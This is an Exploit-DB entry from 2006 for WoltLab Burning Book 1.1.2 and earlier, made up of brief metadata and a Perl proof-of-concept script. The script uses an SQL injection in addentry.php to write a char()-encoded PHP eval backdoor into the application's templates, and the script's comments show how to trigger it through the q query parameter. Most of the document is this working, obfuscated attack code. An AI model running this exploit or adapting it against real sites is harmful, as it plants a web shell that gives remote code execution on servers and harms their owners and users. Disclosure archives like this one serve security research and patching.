WoltLab Burning Book <= 1.1.2 - Remote SQL Injection Exploit PoC

2006-10-16T00:00:00
ID EDB-ID:2579
Type exploitdb
Reporter ShAnKaR
Modified 2006-10-16T00:00:00

Description

WoltLab Burning Book <= 1.1.2 Remote SQL Injection Exploit PoC. CVE-2006-5508,CVE-2006-5509. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

# woltlab.de burning book &lt;=1.1.2 SQL and PHP injection PoC
# use /index.php?q=phpinfo();exit;
# ShAnKaR sec[A]shankar.antichat.ru
# http://antichat.ru/

use LWP;
die("use ./burn-book.pl http://localhost/wbbook/ [1(number book db, default `1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1];
my $ua=LWP::UserAgent-&gt;new();
$ua-&gt;post($ARGV[0].'/addentry.php',[reg_image=&gt;0,send=&gt;'send',name=&gt;1,message=&gt;1,
n=&gt;$ARGV[1].'_templates (`templateid`,`templatename`,`template`) VALUES (char(55,55,55),char(105,110,100,101,120,95,102,105,101,108,100,115),char(92,34,59,64,101,118,97,108,40,36,95,71,69,84,91,113,93,41,59,36,102,105,101,108,100,115,61,92,34,60,98,114,32,47,62,60,117,62,36,102,105,101,108,100,116,105,116,108,101,60,47,117,62,58,32,36,102,105,101,108,100))/*',]);

# milw0rm.com [2006-10-16]